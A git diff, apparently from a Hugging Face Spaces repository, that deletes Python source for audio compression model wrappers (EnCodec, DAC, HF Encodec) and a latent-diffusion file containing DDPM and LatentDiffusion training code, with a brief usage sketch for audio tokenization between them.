- if self.renormalize:
- mono = x.mean(dim=1, keepdim=True)
- volume = mono.pow(2).mean(dim=2, keepdim=True).sqrt()
- scale = 1e-8 + volume
- x = x / scale
- scale = scale.view(-1, 1)
- else:
- scale = None
- return x, scale
-
- def postprocess(self,
- x: torch.Tensor,
- scale: tp.Optional[torch.Tensor] = None) -> torch.Tensor:
- if scale is not None:
- assert self.renormalize
- x = x * scale.view(-1, 1, 1)
- return x
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- assert x.dim() == 3
- length = x.shape[-1]
- x, scale = self.preprocess(x)
-
- emb = self.encoder(x)
- q_res = self.quantizer(emb, self.frame_rate)
- out = self.decoder(q_res.x)
-
- # remove extra padding added by the encoder and decoder
- assert out.shape[-1] >= length, (out.shape[-1], length)
- out = out[..., :length]
-
- q_res.x = self.postprocess(out, scale)
-
- return q_res
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- """Encode the given input tensor to quantized representation along with scale parameter.
-
- Args:
- x (torch.Tensor): Float tensor of shape [B, C, T]
-
- Returns:
- codes, scale (tuple of torch.Tensor, torch.Tensor): Tuple composed of:
- codes an int tensor of shape [B, K, T] with K the number of codebooks used and T the number of timesteps.
- scale a float tensor containing the scale for audio renormalization.
- """
- assert x.dim() == 3
- x, scale = self.preprocess(x)
- emb = self.encoder(x)
- codes = self.quantizer.encode(emb)
- return codes, scale
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- """Decode the given codes to a reconstructed representation, using the scale to perform
- audio denormalization if needed.
-
- Args:
- codes (torch.Tensor): Int tensor of shape [B, K, T]
- scale (torch.Tensor, optional): Float tensor containing the scale value.
-
- Returns:
- out (torch.Tensor): Float tensor of shape [B, C, T], the reconstructed audio.
- """
- emb = self.decode_latent(codes)
- out = self.decoder(emb)
- out = self.postprocess(out, scale)
- # out contains extra padding added by the encoder and decoder
- return out
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.quantizer.decode(codes)
-
-
-class DAC(CompressionModel):
- def __init__(self, model_type: str = "44khz"):
- super().__init__()
- try:
- import dac.utils
- except ImportError:
- raise RuntimeError("Could not import dac, make sure it is installed, "
- "please run `pip install descript-audio-codec`")
- self.model = dac.utils.load_model(model_type=model_type)
- self.n_quantizers = self.total_codebooks
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- # We don't support training with this.
- raise NotImplementedError("Forward and training with DAC not supported.")
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- codes = self.model.encode(x, self.n_quantizers)[1]
- return codes, None
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- assert scale is None
- z_q = self.decode_latent(codes)
- return self.model.decode(z_q)
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.model.quantizer.from_codes(codes)[0]
-
- @property
- def channels(self) -> int:
- return 1
-
- @property
- def frame_rate(self) -> float:
- return self.model.sample_rate / self.model.hop_length
-
- @property
- def sample_rate(self) -> int:
- return self.model.sample_rate
-
- @property
- def cardinality(self) -> int:
- return self.model.codebook_size
-
- @property
- def num_codebooks(self) -> int:
- return self.n_quantizers
-
- @property
- def total_codebooks(self) -> int:
- return self.model.n_codebooks
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer.
- """
- assert n >= 1
- assert n <= self.total_codebooks
- self.n_quantizers = n
-
-
-class HFEncodecCompressionModel(CompressionModel):
- """Wrapper around HuggingFace Encodec.
- """
- def __init__(self, model: HFEncodecModel):
- super().__init__()
- self.model = model
- bws = self.model.config.target_bandwidths
- num_codebooks = [
- bw * 1000 / (self.frame_rate * math.log2(self.cardinality))
- for bw in bws
- ]
- deltas = [nc - int(nc) for nc in num_codebooks]
- # Checking we didn't do some bad maths and we indeed have integers!
- assert all(d <= 1e-3 for d in deltas), deltas
- self.possible_num_codebooks = [int(nc) for nc in num_codebooks]
- self.set_num_codebooks(max(self.possible_num_codebooks))
-
- def forward(self, x: torch.Tensor) -> qt.QuantizedResult:
- # We don't support training with this.
- raise NotImplementedError("Forward and training with HF EncodecModel not supported.")
-
- def encode(self, x: torch.Tensor) -> tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]:
- bandwidth_index = self.possible_num_codebooks.index(self.num_codebooks)
- bandwidth = self.model.config.target_bandwidths[bandwidth_index]
- res = self.model.encode(x, None, bandwidth)
- assert len(res[0]) == 1
- assert len(res[1]) == 1
- return res[0][0], res[1][0]
-
- def decode(self, codes: torch.Tensor, scale: tp.Optional[torch.Tensor] = None):
- if scale is None:
- scales = [None] # type: ignore
- else:
- scales = scale # type: ignore
- res = self.model.decode(codes[None], scales)
- return res[0]
-
- def decode_latent(self, codes: torch.Tensor):
- """Decode from the discrete codes to continuous latent space."""
- return self.model.quantizer.decode(codes.transpose(0, 1))
-
- @property
- def channels(self) -> int:
- return self.model.config.audio_channels
-
- @property
- def frame_rate(self) -> float:
- hop_length = int(np.prod(self.model.config.upsampling_ratios))
- return self.sample_rate / hop_length
-
- @property
- def sample_rate(self) -> int:
- return self.model.config.sampling_rate
-
- @property
- def cardinality(self) -> int:
- return self.model.config.codebook_size
-
- @property
- def num_codebooks(self) -> int:
- return self._num_codebooks
-
- @property
- def total_codebooks(self) -> int:
- return max(self.possible_num_codebooks)
-
- def set_num_codebooks(self, n: int):
- """Set the active number of codebooks used by the quantizer.
- """
- if n not in self.possible_num_codebooks:
- raise ValueError(f"Allowed values for num codebooks: {self.possible_num_codebooks}")
- self._num_codebooks = n
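
Taken together, the classes above give a single entry point for audio tokenization. A minimal usage sketch, assuming audiocraft is installed and the named Hugging Face checkpoint can be downloaded; shapes follow the encode/decode docstrings above:

    import torch
    from audiocraft.models.encodec import CompressionModel  # the module shown above

    model = CompressionModel.get_pretrained('facebook/encodec_32khz', device='cpu')

    # One second of (random) audio shaped [B, C, T], as encode() expects.
    wav = torch.randn(1, model.channels, model.sample_rate)

    codes, scale = model.encode(wav)     # codes: int tensor [B, K, T'], K = model.num_codebooks
    recon = model.decode(codes, scale)   # reconstructed waveform, may carry a little extra padding
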
diff --git a/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py b/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py
deleted file mode 100644
index c7bdbf2bdbe0ff4a415ffbf406b97922b5931a90..0000000000000000000000000000000000000000
--- a/spaces/Purple11/Grounded-Diffusion/ldm/models/diffusion/plms.py
+++ /dev/null
@@ -1,1448 +0,0 @@
-"""
-wild mixture of
-https://github.com/lucidrains/denoising-diffusion-pytorch/blob/7706bdfc6f527f58d33f84b7b522e61e6e3164b3/denoising_diffusion_pytorch/denoising_diffusion_pytorch.py
-https://github.com/openai/improved-diffusion/blob/e94489283bb876ac1477d5dd7709bbbd2d9902ce/improved_diffusion/gaussian_diffusion.py
-https://github.com/CompVis/taming-transformers
--- merci
-"""
-
-import torch
-import torch.nn as nn
-import numpy as np
-import pytorch_lightning as pl
-from torch.optim.lr_scheduler import LambdaLR
-from einops import rearrange, repeat
-from contextlib import contextmanager
-from functools import partial
-from tqdm import tqdm
-from torchvision.utils import make_grid
-from pytorch_lightning.utilities.distributed import rank_zero_only
-
-from ldm.util import log_txt_as_img, exists, default, ismap, isimage, mean_flat, count_params, instantiate_from_config
-from ldm.modules.ema import LitEma
-from ldm.modules.distributions.distributions import normal_kl, DiagonalGaussianDistribution
-from ldm.models.autoencoder import VQModelInterface, IdentityFirstStage, AutoencoderKL
-from ldm.modules.diffusionmodules.util import make_beta_schedule, extract_into_tensor, noise_like
-from ldm.models.diffusion.ddim import DDIMSampler
-
-
-__conditioning_keys__ = {'concat': 'c_concat',
- 'crossattn': 'c_crossattn',
- 'adm': 'y'}
-
-
-def disabled_train(self, mode=True):
- """Overwrite model.train with this function to make sure train/eval mode
- does not change anymore."""
- return self
-
-
-def uniform_on_device(r1, r2, shape, device):
- return (r1 - r2) * torch.rand(*shape, device=device) + r2
-
-
-class DDPM(pl.LightningModule):
- # classic DDPM with Gaussian diffusion, in image space
- def __init__(self,
- unet_config,
- timesteps=1000,
- beta_schedule="linear",
- loss_type="l2",
- ckpt_path=None,
- ignore_keys=[],
- load_only_unet=False,
- monitor="val/loss",
- use_ema=True,
- first_stage_key="image",
- image_size=256,
- channels=3,
- log_every_t=100,
- clip_denoised=True,
- linear_start=1e-4,
- linear_end=2e-2,
- cosine_s=8e-3,
- given_betas=None,
- original_elbo_weight=0.,
- v_posterior=0., # weight for choosing posterior variance as sigma = (1-v) * beta_tilde + v * beta
- l_simple_weight=1.,
- conditioning_key=None,
- parameterization="eps", # all assuming fixed variance schedules
- scheduler_config=None,
- use_positional_encodings=False,
- learn_logvar=False,
- logvar_init=0.,
- ):
- super().__init__()
- assert parameterization in ["eps", "x0"], 'currently only supporting "eps" and "x0"'
- self.parameterization = parameterization
- print(f"{self.__class__.__name__}: Running in {self.parameterization}-prediction mode")
- self.cond_stage_model = None
- self.clip_denoised = clip_denoised
- self.log_every_t = log_every_t
- self.first_stage_key = first_stage_key
- self.image_size = image_size # try conv?
- self.channels = channels
- self.use_positional_encodings = use_positional_encodings
- self.model = DiffusionWrapper(unet_config, conditioning_key)
- count_params(self.model, verbose=True)
- self.use_ema = use_ema
- if self.use_ema:
- self.model_ema = LitEma(self.model)
- print(f"Keeping EMAs of {len(list(self.model_ema.buffers()))}.")
-
- self.use_scheduler = scheduler_config is not None
- if self.use_scheduler:
- self.scheduler_config = scheduler_config
-
- self.v_posterior = v_posterior
- self.original_elbo_weight = original_elbo_weight
- self.l_simple_weight = l_simple_weight
-
- if monitor is not None:
- self.monitor = monitor
- if ckpt_path is not None:
- self.init_from_ckpt(ckpt_path, ignore_keys=ignore_keys, only_model=load_only_unet)
-
- self.register_schedule(given_betas=given_betas, beta_schedule=beta_schedule, timesteps=timesteps,
- linear_start=linear_start, linear_end=linear_end, cosine_s=cosine_s)
-
- self.loss_type = loss_type
-
- self.learn_logvar = learn_logvar
- self.logvar = torch.full(fill_value=logvar_init, size=(self.num_timesteps,))
- if self.learn_logvar:
- self.logvar = nn.Parameter(self.logvar, requires_grad=True)
-
-
- def register_schedule(self, given_betas=None, beta_schedule="linear", timesteps=1000,
- linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3):
- if exists(given_betas):
- betas = given_betas
- else:
- betas = make_beta_schedule(beta_schedule, timesteps, linear_start=linear_start, linear_end=linear_end,
- cosine_s=cosine_s)
- alphas = 1. - betas
- alphas_cumprod = np.cumprod(alphas, axis=0)
- alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])
- alphas_cumprod_next = np.append(alphas_cumprod[1:], 0.0)
-
- timesteps, = betas.shape
- self.num_timesteps = int(timesteps)
- self.linear_start = linear_start
- self.linear_end = linear_end
- assert alphas_cumprod.shape[0] == self.num_timesteps, 'alphas have to be defined for each timestep'
-
- to_torch = partial(torch.tensor, dtype=torch.float32)
-
- self.register_buffer('betas', to_torch(betas))
- self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))
- self.register_buffer('alphas_cumprod_prev', to_torch(alphas_cumprod_prev))
- self.register_buffer('alphas_cumprod_next', to_torch(alphas_cumprod_next))
-
- # calculations for diffusion q(x_t | x_{t-1}) and others
- self.register_buffer('sqrt_alphas_cumprod', to_torch(np.sqrt(alphas_cumprod)))
- self.register_buffer('sqrt_one_minus_alphas_cumprod', to_torch(np.sqrt(1. - alphas_cumprod)))
- self.register_buffer('log_one_minus_alphas_cumprod', to_torch(np.log(1. - alphas_cumprod)))
- self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))
- self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))
-
- # calculations for posterior q(x_{t-1} | x_t, x_0)
- posterior_variance = (1 - self.v_posterior) * betas * (1. - alphas_cumprod_prev) / (
- 1. - alphas_cumprod) + self.v_posterior * betas
- # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)
- self.register_buffer('posterior_variance', to_torch(posterior_variance))
- # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain
- self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))
- self.register_buffer('posterior_mean_coef1', to_torch(
- betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))
- self.register_buffer('posterior_mean_coef2', to_torch(
- (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. - alphas_cumprod)))
-
- if self.parameterization == "eps":
- lvlb_weights = self.betas ** 2 / (
- 2 * self.posterior_variance * to_torch(alphas) * (1 - self.alphas_cumprod))
- elif self.parameterization == "x0":
- lvlb_weights = 0.5 * np.sqrt(torch.Tensor(alphas_cumprod)) / (2. * 1 - torch.Tensor(alphas_cumprod))
- else:
- raise NotImplementedError("mu not supported")
- # TODO how to choose this term
- lvlb_weights[0] = lvlb_weights[1]
- self.register_buffer('lvlb_weights', lvlb_weights, persistent=False)
- assert not torch.isnan(self.lvlb_weights).any()
-
- @contextmanager
- def ema_scope(self, context=None):
- if self.use_ema:
- self.model_ema.store(self.model.parameters())
- self.model_ema.copy_to(self.model)
- if context is not None:
- print(f"{context}: Switched to EMA weights")
- try:
- yield None
- finally:
- if self.use_ema:
- self.model_ema.restore(self.model.parameters())
- if context is not None:
- print(f"{context}: Restored training weights")
-
- def init_from_ckpt(self, path, ignore_keys=list(), only_model=False):
- sd = torch.load(path, map_location="cpu")
- if "state_dict" in list(sd.keys()):
- sd = sd["state_dict"]
- keys = list(sd.keys())
- for k in keys:
- for ik in ignore_keys:
- if k.startswith(ik):
- print("Deleting key {} from state_dict.".format(k))
- del sd[k]
- missing, unexpected = self.load_state_dict(sd, strict=False) if not only_model else self.model.load_state_dict(
- sd, strict=False)
- print(f"Restored from {path} with {len(missing)} missing and {len(unexpected)} unexpected keys")
- if len(missing) > 0:
- print(f"Missing Keys: {missing}")
- if len(unexpected) > 0:
- print(f"Unexpected Keys: {unexpected}")
-
- def q_mean_variance(self, x_start, t):
- """
- Get the distribution q(x_t | x_0).
- :param x_start: the [N x C x ...] tensor of noiseless inputs.
- :param t: the number of diffusion steps (minus 1). Here, 0 means one step.
- :return: A tuple (mean, variance, log_variance), all of x_start's shape.
- """
- mean = (extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start)
- variance = extract_into_tensor(1.0 - self.alphas_cumprod, t, x_start.shape)
- log_variance = extract_into_tensor(self.log_one_minus_alphas_cumprod, t, x_start.shape)
- return mean, variance, log_variance
-
- def predict_start_from_noise(self, x_t, t, noise):
- return (
- extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t -
- extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape) * noise
- )
-
- def q_posterior(self, x_start, x_t, t):
- posterior_mean = (
- extract_into_tensor(self.posterior_mean_coef1, t, x_t.shape) * x_start +
- extract_into_tensor(self.posterior_mean_coef2, t, x_t.shape) * x_t
- )
- posterior_variance = extract_into_tensor(self.posterior_variance, t, x_t.shape)
- posterior_log_variance_clipped = extract_into_tensor(self.posterior_log_variance_clipped, t, x_t.shape)
- return posterior_mean, posterior_variance, posterior_log_variance_clipped
-
- def p_mean_variance(self, x, t, clip_denoised: bool):
- model_out = self.model(x, t)
- if self.parameterization == "eps":
- x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)
- elif self.parameterization == "x0":
- x_recon = model_out
- if clip_denoised:
- x_recon.clamp_(-1., 1.)
-
- model_mean, posterior_variance, posterior_log_variance = self.q_posterior(x_start=x_recon, x_t=x, t=t)
- return model_mean, posterior_variance, posterior_log_variance
-
- @torch.no_grad()
- def p_sample(self, x, t, clip_denoised=True, repeat_noise=False):
- b, *_, device = *x.shape, x.device
- model_mean, _, model_log_variance = self.p_mean_variance(x=x, t=t, clip_denoised=clip_denoised)
- noise = noise_like(x.shape, device, repeat_noise)
- # no noise when t == 0
- nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise
-
- @torch.no_grad()
- def p_sample_loop(self, shape, return_intermediates=False):
- device = self.betas.device
- b = shape[0]
- img = torch.randn(shape, device=device)
- intermediates = [img]
- for i in tqdm(reversed(range(0, self.num_timesteps)), desc='Sampling t', total=self.num_timesteps):
- img = self.p_sample(img, torch.full((b,), i, device=device, dtype=torch.long),
- clip_denoised=self.clip_denoised)
- if i % self.log_every_t == 0 or i == self.num_timesteps - 1:
- intermediates.append(img)
- if return_intermediates:
- return img, intermediates
- return img
-
- @torch.no_grad()
- def sample(self, batch_size=16, return_intermediates=False):
- image_size = self.image_size
- channels = self.channels
- return self.p_sample_loop((batch_size, channels, image_size, image_size),
- return_intermediates=return_intermediates)
-
- def q_sample(self, x_start, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- return (extract_into_tensor(self.sqrt_alphas_cumprod, t, x_start.shape) * x_start +
- extract_into_tensor(self.sqrt_one_minus_alphas_cumprod, t, x_start.shape) * noise)
-
- def get_loss(self, pred, target, mean=True):
- if self.loss_type == 'l1':
- loss = (target - pred).abs()
- if mean:
- loss = loss.mean()
- elif self.loss_type == 'l2':
- if mean:
- loss = torch.nn.functional.mse_loss(target, pred)
- else:
- loss = torch.nn.functional.mse_loss(target, pred, reduction='none')
- else:
- raise NotImplementedError("unknown loss type '{loss_type}'")
-
- return loss
-
- def p_losses(self, x_start, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- model_out = self.model(x_noisy, t)
-
- loss_dict = {}
- if self.parameterization == "eps":
- target = noise
- elif self.parameterization == "x0":
- target = x_start
- else:
- raise NotImplementedError(f"Paramterization {self.parameterization} not yet supported")
-
- loss = self.get_loss(model_out, target, mean=False).mean(dim=[1, 2, 3])
-
- log_prefix = 'train' if self.training else 'val'
-
- loss_dict.update({f'{log_prefix}/loss_simple': loss.mean()})
- loss_simple = loss.mean() * self.l_simple_weight
-
- loss_vlb = (self.lvlb_weights[t] * loss).mean()
- loss_dict.update({f'{log_prefix}/loss_vlb': loss_vlb})
-
- loss = loss_simple + self.original_elbo_weight * loss_vlb
-
- loss_dict.update({f'{log_prefix}/loss': loss})
-
- return loss, loss_dict
-
- def forward(self, x, *args, **kwargs):
- # b, c, h, w, device, img_size, = *x.shape, x.device, self.image_size
- # assert h == img_size and w == img_size, f'height and width of image must be {img_size}'
- t = torch.randint(0, self.num_timesteps, (x.shape[0],), device=self.device).long()
- return self.p_losses(x, t, *args, **kwargs)
-
- def get_input(self, batch, k):
- x = batch[k]
- if len(x.shape) == 3:
- x = x[..., None]
- x = rearrange(x, 'b h w c -> b c h w')
- x = x.to(memory_format=torch.contiguous_format).float()
- return x
-
- def shared_step(self, batch):
- x = self.get_input(batch, self.first_stage_key)
- loss, loss_dict = self(x)
- return loss, loss_dict
-
- def training_step(self, batch, batch_idx):
- loss, loss_dict = self.shared_step(batch)
-
- self.log_dict(loss_dict, prog_bar=True,
- logger=True, on_step=True, on_epoch=True)
-
- self.log("global_step", self.global_step,
- prog_bar=True, logger=True, on_step=True, on_epoch=False)
-
- if self.use_scheduler:
- lr = self.optimizers().param_groups[0]['lr']
- self.log('lr_abs', lr, prog_bar=True, logger=True, on_step=True, on_epoch=False)
-
- return loss
-
- @torch.no_grad()
- def validation_step(self, batch, batch_idx):
- _, loss_dict_no_ema = self.shared_step(batch)
- with self.ema_scope():
- _, loss_dict_ema = self.shared_step(batch)
- loss_dict_ema = {key + '_ema': loss_dict_ema[key] for key in loss_dict_ema}
- self.log_dict(loss_dict_no_ema, prog_bar=False, logger=True, on_step=False, on_epoch=True)
- self.log_dict(loss_dict_ema, prog_bar=False, logger=True, on_step=False, on_epoch=True)
-
- def on_train_batch_end(self, *args, **kwargs):
- if self.use_ema:
- self.model_ema(self.model)
-
- def _get_rows_from_list(self, samples):
- n_imgs_per_row = len(samples)
- denoise_grid = rearrange(samples, 'n b c h w -> b n c h w')
- denoise_grid = rearrange(denoise_grid, 'b n c h w -> (b n) c h w')
- denoise_grid = make_grid(denoise_grid, nrow=n_imgs_per_row)
- return denoise_grid
-
- @torch.no_grad()
- def log_images(self, batch, N=8, n_row=2, sample=True, return_keys=None, **kwargs):
- log = dict()
- x = self.get_input(batch, self.first_stage_key)
- N = min(x.shape[0], N)
- n_row = min(x.shape[0], n_row)
- x = x.to(self.device)[:N]
- log["inputs"] = x
-
- # get diffusion row
- diffusion_row = list()
- x_start = x[:n_row]
-
- for t in range(self.num_timesteps):
- if t % self.log_every_t == 0 or t == self.num_timesteps - 1:
- t = repeat(torch.tensor([t]), '1 -> b', b=n_row)
- t = t.to(self.device).long()
- noise = torch.randn_like(x_start)
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- diffusion_row.append(x_noisy)
-
- log["diffusion_row"] = self._get_rows_from_list(diffusion_row)
-
- if sample:
- # get denoise row
- with self.ema_scope("Plotting"):
- samples, denoise_row = self.sample(batch_size=N, return_intermediates=True)
-
- log["samples"] = samples
- log["denoise_row"] = self._get_rows_from_list(denoise_row)
-
- if return_keys:
- if np.intersect1d(list(log.keys()), return_keys).shape[0] == 0:
- return log
- else:
- return {key: log[key] for key in return_keys}
- return log
-
- def configure_optimizers(self):
- lr = self.learning_rate
- params = list(self.model.parameters())
- if self.learn_logvar:
- params = params + [self.logvar]
- opt = torch.optim.AdamW(params, lr=lr)
- return opt
-
-
-class LatentDiffusion(DDPM):
- """main class"""
- def __init__(self,
- first_stage_config,
- cond_stage_config,
- num_timesteps_cond=None,
- cond_stage_key="image",
- cond_stage_trainable=False,
- concat_mode=True,
- cond_stage_forward=None,
- conditioning_key=None,
- scale_factor=1.0,
- scale_by_std=False,
- *args, **kwargs):
- self.num_timesteps_cond = default(num_timesteps_cond, 1)
- self.scale_by_std = scale_by_std
- assert self.num_timesteps_cond <= kwargs['timesteps']
- # for backwards compatibility after implementation of DiffusionWrapper
- if conditioning_key is None:
- conditioning_key = 'concat' if concat_mode else 'crossattn'
- if cond_stage_config == '__is_unconditional__':
- conditioning_key = None
- ckpt_path = kwargs.pop("ckpt_path", None)
- ignore_keys = kwargs.pop("ignore_keys", [])
- super().__init__(conditioning_key=conditioning_key, *args, **kwargs)
- self.concat_mode = concat_mode
- self.cond_stage_trainable = cond_stage_trainable
- self.cond_stage_key = cond_stage_key
- try:
- self.num_downs = len(first_stage_config.params.ddconfig.ch_mult) - 1
- except:
- self.num_downs = 0
- if not scale_by_std:
- self.scale_factor = scale_factor
- else:
- self.register_buffer('scale_factor', torch.tensor(scale_factor))
- self.instantiate_first_stage(first_stage_config)
- self.instantiate_cond_stage(cond_stage_config)
- self.cond_stage_forward = cond_stage_forward
- self.clip_denoised = False
- self.bbox_tokenizer = None
-
- self.restarted_from_ckpt = False
- if ckpt_path is not None:
- self.init_from_ckpt(ckpt_path, ignore_keys)
- self.restarted_from_ckpt = True
-
- def make_cond_schedule(self, ):
- self.cond_ids = torch.full(size=(self.num_timesteps,), fill_value=self.num_timesteps - 1, dtype=torch.long)
- ids = torch.round(torch.linspace(0, self.num_timesteps - 1, self.num_timesteps_cond)).long()
- self.cond_ids[:self.num_timesteps_cond] = ids
-
- @rank_zero_only
- @torch.no_grad()
- def on_train_batch_start(self, batch, batch_idx, dataloader_idx):
- # only for very first batch
- if self.scale_by_std and self.current_epoch == 0 and self.global_step == 0 and batch_idx == 0 and not self.restarted_from_ckpt:
- assert self.scale_factor == 1., 'rather not use custom rescaling and std-rescaling simultaneously'
- # set rescale weight to 1./std of encodings
- print("### USING STD-RESCALING ###")
- x = super().get_input(batch, self.first_stage_key)
- x = x.to(self.device)
- encoder_posterior = self.encode_first_stage(x)
- z = self.get_first_stage_encoding(encoder_posterior).detach()
- del self.scale_factor
- self.register_buffer('scale_factor', 1. / z.flatten().std())
- print(f"setting self.scale_factor to {self.scale_factor}")
- print("### USING STD-RESCALING ###")
-
- def register_schedule(self,
- given_betas=None, beta_schedule="linear", timesteps=1000,
- linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3):
- super().register_schedule(given_betas, beta_schedule, timesteps, linear_start, linear_end, cosine_s)
-
- self.shorten_cond_schedule = self.num_timesteps_cond > 1
- if self.shorten_cond_schedule:
- self.make_cond_schedule()
-
- def instantiate_first_stage(self, config):
- model = instantiate_from_config(config)
- self.first_stage_model = model.eval()
- self.first_stage_model.train = disabled_train
- for param in self.first_stage_model.parameters():
- param.requires_grad = False
-
- def instantiate_cond_stage(self, config):
- if not self.cond_stage_trainable:
- if config == "__is_first_stage__":
- print("Using first stage also as cond stage.")
- self.cond_stage_model = self.first_stage_model
- elif config == "__is_unconditional__":
- print(f"Training {self.__class__.__name__} as an unconditional model.")
- self.cond_stage_model = None
- # self.be_unconditional = True
- else:
- model = instantiate_from_config(config)
- self.cond_stage_model = model.eval()
- self.cond_stage_model.train = disabled_train
- for param in self.cond_stage_model.parameters():
- param.requires_grad = False
- else:
- assert config != '__is_first_stage__'
- assert config != '__is_unconditional__'
- model = instantiate_from_config(config)
- self.cond_stage_model = model
-
- def _get_denoise_row_from_list(self, samples, desc='', force_no_decoder_quantization=False):
- denoise_row = []
- for zd in tqdm(samples, desc=desc):
- denoise_row.append(self.decode_first_stage(zd.to(self.device),
- force_not_quantize=force_no_decoder_quantization))
- n_imgs_per_row = len(denoise_row)
- denoise_row = torch.stack(denoise_row) # n_log_step, n_row, C, H, W
- denoise_grid = rearrange(denoise_row, 'n b c h w -> b n c h w')
- denoise_grid = rearrange(denoise_grid, 'b n c h w -> (b n) c h w')
- denoise_grid = make_grid(denoise_grid, nrow=n_imgs_per_row)
- return denoise_grid
-
- def get_first_stage_encoding(self, encoder_posterior):
- if isinstance(encoder_posterior, DiagonalGaussianDistribution):
- z = encoder_posterior.sample()
- elif isinstance(encoder_posterior, torch.Tensor):
- z = encoder_posterior
- else:
- raise NotImplementedError(f"encoder_posterior of type '{type(encoder_posterior)}' not yet implemented")
- return self.scale_factor * z
-
- def get_learned_conditioning(self, c):
- if self.cond_stage_forward is None:
- if hasattr(self.cond_stage_model, 'encode') and callable(self.cond_stage_model.encode):
- c = self.cond_stage_model.encode(c)
- if isinstance(c, DiagonalGaussianDistribution):
- c = c.mode()
- else:
- c = self.cond_stage_model(c)
- else:
- assert hasattr(self.cond_stage_model, self.cond_stage_forward)
- c = getattr(self.cond_stage_model, self.cond_stage_forward)(c)
- return c
-
- def meshgrid(self, h, w):
- y = torch.arange(0, h).view(h, 1, 1).repeat(1, w, 1)
- x = torch.arange(0, w).view(1, w, 1).repeat(h, 1, 1)
-
- arr = torch.cat([y, x], dim=-1)
- return arr
-
- def delta_border(self, h, w):
- """
- :param h: height
- :param w: width
- :return: normalized distance to image border,
- with min distance = 0 at border and max dist = 0.5 at image center
- """
- lower_right_corner = torch.tensor([h - 1, w - 1]).view(1, 1, 2)
- arr = self.meshgrid(h, w) / lower_right_corner
- dist_left_up = torch.min(arr, dim=-1, keepdims=True)[0]
- dist_right_down = torch.min(1 - arr, dim=-1, keepdims=True)[0]
- edge_dist = torch.min(torch.cat([dist_left_up, dist_right_down], dim=-1), dim=-1)[0]
- return edge_dist
-
- def get_weighting(self, h, w, Ly, Lx, device):
- weighting = self.delta_border(h, w)
- weighting = torch.clip(weighting, self.split_input_params["clip_min_weight"],
- self.split_input_params["clip_max_weight"], )
- weighting = weighting.view(1, h * w, 1).repeat(1, 1, Ly * Lx).to(device)
-
- if self.split_input_params["tie_braker"]:
- L_weighting = self.delta_border(Ly, Lx)
- L_weighting = torch.clip(L_weighting,
- self.split_input_params["clip_min_tie_weight"],
- self.split_input_params["clip_max_tie_weight"])
-
- L_weighting = L_weighting.view(1, 1, Ly * Lx).to(device)
- weighting = weighting * L_weighting
- return weighting
-
- def get_fold_unfold(self, x, kernel_size, stride, uf=1, df=1): # todo load once not every time, shorten code
- """
- :param x: img of size (bs, c, h, w)
- :return: n img crops of size (n, bs, c, kernel_size[0], kernel_size[1])
- """
- bs, nc, h, w = x.shape
-
- # number of crops in image
- Ly = (h - kernel_size[0]) // stride[0] + 1
- Lx = (w - kernel_size[1]) // stride[1] + 1
-
- if uf == 1 and df == 1:
- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold = torch.nn.Fold(output_size=x.shape[2:], **fold_params)
-
- weighting = self.get_weighting(kernel_size[0], kernel_size[1], Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h, w) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0], kernel_size[1], Ly * Lx))
-
- elif uf > 1 and df == 1:
- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold_params2 = dict(kernel_size=(kernel_size[0] * uf, kernel_size[0] * uf),
- dilation=1, padding=0,
- stride=(stride[0] * uf, stride[1] * uf))
- fold = torch.nn.Fold(output_size=(x.shape[2] * uf, x.shape[3] * uf), **fold_params2)
-
- weighting = self.get_weighting(kernel_size[0] * uf, kernel_size[1] * uf, Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h * uf, w * uf) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0] * uf, kernel_size[1] * uf, Ly * Lx))
-
- elif df > 1 and uf == 1:
